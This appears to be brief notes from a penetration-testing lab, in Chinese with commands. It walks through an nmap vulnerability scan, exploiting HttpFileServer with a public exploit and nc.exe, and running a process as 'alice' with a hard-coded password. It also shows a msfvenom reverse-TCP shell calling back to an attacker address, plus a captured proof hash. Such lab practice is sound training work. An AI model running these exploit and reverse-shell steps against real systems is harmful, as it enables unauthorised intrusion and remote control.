nmap -T4 -A -sS -sV -vv --script vuln -p- --open -n -Pn 10.11.1.49 -oX 10.11.1.49.xml
xsltproc -o 10.11.1.49.html 10.11.1.49.xml
9505端口运行HttpFileServer服务,搜索HFS得到39161.py 修改里面的端口和放置nc.exe
得到shell
$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("alice", $secpasswd)
$computer = "bethany2"
[System.Diagnostics.Process]::Start("C:\Users\Public\2.exe", "", $mycreds.Username, $mycreds.Password, $computer)
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.11.0.185 LPORT=444 -f exe -o 1.exe
powershell -ExecutionPolicy Bypass -File c:\users\public\msfvenom_test.ps1
得到alice的身份然后就可以查看prof.txt
Alice就是管理员,无需提权
1f1f1eb58e44d5d24e44070b3b29c0d5